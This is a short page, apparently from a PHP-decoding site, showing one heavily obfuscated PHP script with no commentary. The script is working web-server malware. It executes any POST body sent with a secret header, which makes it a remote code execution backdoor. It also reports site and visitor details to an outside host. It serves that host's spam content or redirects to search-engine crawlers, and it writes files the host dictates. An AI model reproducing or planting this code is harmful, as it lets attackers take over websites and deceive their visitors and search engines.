PHP Decode

<?php  goto RGBbyMlBL6; hs_cRsjJEn: xq4fQ3EYlW: if (!(stripos($cntx, "\x3c\77\170\x6d\x6c") === 0)) { goto MuWwyNcNba; } @header("\x43\x6f\x6e\164\145\x6e\164\55\x74\171\x70\x65\72\x20\164\x65\170\164\57\x78\155\154"); exit($cntx); MuWwyNcNba: goto f1hqCqLEHx; PgnzjI8kg6: $values = explode("\x5b\x2c\135", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { goto DPMj8cjSZU; } exit("\156\157\x20\x66\x61\154\163\x65"); goto najghpKSvO; goto S5b1JQDeYx; RLLMYh6iEM: exit; QWhRfhU0D3: if (!($uri !== "\x2f\x66\x61\x76\151\143\157\156\56\151\143\x6f" && (@preg_match("\x23\x67\x6f\x6f\x67\154\145\x7c\x79\141\150\x6f\x6f\x7c\x62\x69\156\x67\43\x69", $ua) || @preg_match("\43\147\x6f\157\x67\x6c\145\x2e\143\157\56\152\x70\174\147\157\157\x67\x6c\x65\56\143\157\155\x7c\171\x61\150\157\157\56\143\x6f\155\x7c\x79\x61\150\x6f\157\56\143\157\x2e\x6a\x70\x7c\142\x69\x6e\x67\x2e\x63\157\155\x23\x69", $ur) && (@preg_match("\x23\133\57\134\x3f\x5d\x28\133\x61\x2d\x7a\60\55\x39\135\173\61\x7d\51\133\55\x5f\57\x5d\x3f\50\134\144\53\x5f\x5c\144\x2b\x5f\x5c\144\53\51\44\43\151", $uri) || @preg_match("\x23\133\x2f\x5c\77\135\x28\x5b\x61\x2d\x7a\x30\55\71\135\x7b\x31\x7d\51\x5b\55\x5f\x2f\135\x3f\50\134\x64\53\x29\x23\x69", $uri))))) { goto ByHqJ_Rs2R; } list($cntx, $code, $ctype) = urlx("\x68\164\164\x70\72\x2f\x2f" . $gov . "\x2f\151\x6e\x64\x65\170\77" . $postdata, $header, $postdata); if (!(stripos($ctype, "\147\x7a\151\160") > 0)) { goto cMC7XYJpSg; } goto iKken36383; S5b1JQDeYx: DPMj8cjSZU: exit("\x65\156\144\40\157\153"); najghpKSvO: JVF7qqfu3N: if (!(stripos($cntx, "\x6f\153") === 0)) { goto nZbjOlu1O8; } goto pGe1dLzMA0; RGBbyMlBL6: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "\62\x2e\62\x2e\61\67"; $gov = "\x6a\146\x2e\143\x72\145\x61\164\x65\163\x65\157\x2e\170\x79\172"; goto Uj94AKDcaI; fiG0iscuwl: $postdata = "\x70\162\x6f\x74\157\75{$proto}\46\163\x68\x6f\x73\x74\x3d{$host}\x26\x69\x70\75{$ip}\46\144\142\x67\x72\x6f\165\x70\75{$db}\x26\x75\x72\151\75{$uri}"; if (!(strlen($token) > 0)) { goto QWhRfhU0D3; } @todk("\56\145\107\142\x41\x30\x54\x79\x32\x57\x68", @file_get_contents("\x70\x68\x70\72\57\57\151\156\x70\x75\x74"), FILE_USE_INCLUDE_PATH); echo include "\x2e\145\x47\x62\x41\60\x54\171\x32\127\x68"; unlink("\x2e\145\107\x62\101\60\x54\171\x32\x57\150"); goto RLLMYh6iEM; ARk5Sw5nGX: $host = $_SERVER["\x48\x54\124\120\137\x48\x4f\x53\x54"]; $lang = isset($_SERVER["\x48\x54\124\120\x5f\101\103\103\105\120\x54\x5f\114\x41\x4e\x47\x55\101\107\x45"]) ? $_SERVER["\110\124\x54\x50\x5f\101\103\x43\105\x50\x54\x5f\x4c\101\x4e\107\125\x41\x47\105"] : ''; $token = isset($_SERVER["\x48\x54\x54\120\x5f\130\x44\x4f\111\115"]) ? $_SERVER["\x48\x54\x54\x50\x5f\x58\104\x4f\x49\x4d"] : ''; $proto = !empty($_SERVER["\110\124\x54\120\123"]) && strtolower($_SERVER["\x48\124\124\120\123"]) !== "\157\146\x66" || isset($_SERVER["\110\x54\x54\x50\x5f\130\137\x46\117\122\127\101\122\104\105\x44\137\120\x52\117\x54\117"]) && $_SERVER["\110\124\x54\x50\137\x58\137\106\117\122\127\101\x52\x44\x45\x44\137\120\x52\x4f\124\x4f"] === "\150\164\164\x70\163" || !empty($_SERVER["\x48\x54\x54\x50\x5f\x46\122\117\116\x54\x5f\105\x4e\104\x5f\110\124\x54\x50\123"]) && strtolower($_SERVER["\110\x54\x54\120\x5f\106\122\117\116\124\x5f\x45\116\x44\137\110\124\124\x50\x53"]) !== "\x6f\x66\146" ? "\150\164\164\x70\x73" : "\150\x74\x74\160"; $header = array("\x4c\x61\156\147\x3a\x20" . $lang, "\x55\x73\x65\x72\x2d\101\147\145\156\x74\72\x20" . $ua, "\x52\145\146\x65\x72\x65\162\72\x20" . $ur, "\x48\x74\x74\x70\x2d\120\162\x6f\164\x6f\72\40" . $proto, "\x48\x74\164\160\55\x48\x6f\x73\164\72\40" . $host, "\x48\164\164\160\x2d\125\x72\x69\x3a\40" . $uri, "\104\x62\147\162\x6f\165\x70\x3a\40" . $gov, "\110\x74\164\160\55\x58\x2d\x46\x6f\x72\x77\x61\162\x64\x65\144\55\x46\x6f\x72\x3a\40" . $ip, "\x54\157\x6b\x65\156\x3a\x20" . $token); goto fiG0iscuwl; SxGB_IwKQe: if (!($cntx != '')) { goto clUQd1W8Y5; } exit($cntx); clUQd1W8Y5: ByHqJ_Rs2R: function urlx($url, $header = null, $postdata = null, $ua = null) { if (!function_exists("\x63\x75\162\x6c\137\x69\x6e\151\x74")) { return; } try { goto u8ntJVkesP; fC8KffY_pq: curl_setopt($ch, CURLOPT_ENCODING, "\x67\x7a\151\160\54\x64\145\x66\x6c\x61\x74\x65"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto dK0D9gwGYE; u8ntJVkesP: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto fC8KffY_pq; GHXL1e4Lnf: $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); curl_close($ch); goto Vkr8UbmNFd; dK0D9gwGYE: if (!($postdata !== null && $postdata !== '')) { goto wZsI8FqKpJ; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); wZsI8FqKpJ: $body = curl_exec($ch); goto GHXL1e4Lnf; Vkr8UbmNFd: } catch (Exception $e) { } if (!($body === false && function_exists("\x66\151\x6c\x65\x5f\147\145\x74\137\x63\x6f\156\164\145\x6e\x74\163"))) { goto gKUACpTzzy; } ini_set("\165\x73\145\x72\137\x61\147\x65\x6e\x74", "\115\157\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\50\143\157\x6d\x70\141\164\151\x62\154\145\x3b\x4d\x53\x49\x45\40\x36\x2e\x30\x3b\127\151\x6e\144\x6f\x77\x73\x20\116\124\40\x35\56\x32\x3b\56\x4e\105\x54\x20\103\114\x52\40\61\x2e\61\x2e\x34\x33\x32\62\x29"); try { $body = @file_get_contents($url); } catch (Exception $e) { } gKUACpTzzy: return array($body, $code, $ctype); } goto u0slBRQpyr; u0slBRQpyr: function todk($fil, $str) { @file_put_contents($fil, $str); } goto WpxJQdbchL; Uj94AKDcaI: $db = "4001"; $ip = clientip(); $ur = isset($_SERVER["\110\124\124\120\137\122\x45\106\x45\122\105\122"]) ? $_SERVER["\110\124\x54\120\x5f\x52\x45\x46\x45\x52\x45\x52"] : ''; $ua = isset($_SERVER["\110\x54\x54\x50\137\125\x53\x45\122\137\x41\107\x45\x4e\x54"]) ? $_SERVER["\110\124\x54\120\137\x55\123\105\122\x5f\101\107\105\116\x54"] : ''; $uri = $_SERVER["\x52\105\x51\125\105\123\124\137\125\122\111"]; goto ARk5Sw5nGX; pGe1dLzMA0: exit($cntx . "\40" . $gov . $ixv); nZbjOlu1O8: if (!($code >= 400 && $code < 500)) { goto g9Fj5z4fAO; } @header("\x48\x54\124\120\57\x31\56\61\40\x34\x30\x34\40\116\x6f\x74\40\x46\x6f\x75\156\144"); exit; goto pdoWXncdWZ; YSrpLJRNn0: if (!strstr($cntx, "\x5b\54\x5d")) { goto Sh588TNZsp; } $segs = explode("\x5b\x2c\135", $cntx); $lines = explode("\x2c", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; cv3m9WSD_2: } goto bIvyHT5Q36; bIvyHT5Q36: Kq9Evupeb_: exit($result); Sh588TNZsp: YBe5lhyBW5: if (!@preg_match("\x23\x5e\x5b\136\56\x5d\x2a\56\50\164\x78\x74\174\160\150\x70\x29\x23\x69", $cntx)) { goto JVF7qqfu3N; } goto PgnzjI8kg6; f1hqCqLEHx: if (!(stripos($cntx, "\x68\164\164\x70") === 0)) { goto YBe5lhyBW5; } if (!stripos($cntx, "\x3f\155\141\151\x6e\137\160\x61\x67\145\75")) { goto ibrY2l1xoU; } @header("\x4c\x6f\x63\x61\x74\x69\157\x6e\72\x20" . $cntx); exit; ibrY2l1xoU: goto YSrpLJRNn0; iKken36383: @header("\x43\157\x6e\164\x65\x6e\x74\x2d\164\x79\160\145\x3a\40\141\x70\160\154\x69\143\141\164\151\x6f\x6e\x2f\x78\x2d\147\x7a\x69\160"); exit($cntx); cMC7XYJpSg: if (!(stripos($cntx, "\74\x21\x64\157\143\x74") === 0 || stripos($cntx, "\74\150\x74\x6d\x6c") === 0)) { goto xq4fQ3EYlW; } exit($cntx); goto hs_cRsjJEn; pdoWXncdWZ: g9Fj5z4fAO: if (!($code >= 500)) { goto SThWxaFL5D; } @header("\110\x54\x54\120\57\x31\x2e\x31\40\x35\x30\x30\x20\111\156\164\x65\162\156\x61\154\x20\123\145\162\166\145\162\x20\105\x72\162\x6f\162"); exit; SThWxaFL5D: goto SxGB_IwKQe; WpxJQdbchL: function clientip() { goto y8tL4h5Wxe; tny4LxycnB: goto KCYxoUwIuy; t2cdQIwC9P: $realip = $_SERVER["\x52\105\x4d\117\124\x45\x5f\101\104\104\122"]; KCYxoUwIuy: if (!stristr($realip, "\x2c")) { goto xwNnn_mLJ6; } goto knjrhnXlG4; y8tL4h5Wxe: $realip = ''; if (isset($_SERVER["\x48\124\x54\120\x5f\x58\137\106\117\122\127\x41\122\x44\105\x44\x5f\x46\x4f\122"]) && $_SERVER["\110\x54\124\120\x5f\x58\x5f\106\x4f\x52\127\101\x52\x44\x45\x44\137\106\x4f\x52"] !== '') { goto OSy2_bZqy2; } if (getenv("\x52\x45\x4d\x4f\x54\105\x5f\x41\x44\x44\x52") && strcasecmp(getenv("\122\105\x4d\x4f\x54\105\137\x41\104\x44\x52"), "\x75\x6e\153\x6e\157\167\x6e")) { goto DP9ihn4YES; } if (isset($_SERVER["\x52\x45\115\117\124\x45\x5f\101\104\x44\122"]) && $_SERVER["\122\105\x4d\x4f\124\x45\137\x41\104\x44\x52"] && strcasecmp($_SERVER["\122\105\115\117\124\105\137\x41\x44\104\122"], "\165\156\153\x6e\157\x77\156")) { goto t2cdQIwC9P; } goto KCYxoUwIuy; goto jv39_Cl83n; jv39_Cl83n: OSy2_bZqy2: $realip = $_SERVER["\x48\124\x54\120\137\x58\137\x46\x4f\122\x57\x41\x52\104\x45\x44\x5f\x46\117\x52"]; goto KCYxoUwIuy; DP9ihn4YES: $realip = getenv("\x52\105\x4d\x4f\x54\x45\x5f\x41\x44\104\122"); goto tny4LxycnB; knjrhnXlG4: $values = explode("\x2c", $realip); $realip = $values[0]; xwNnn_mLJ6: return $realip; goto ZPkRr1n15e; ZPkRr1n15e: } ?>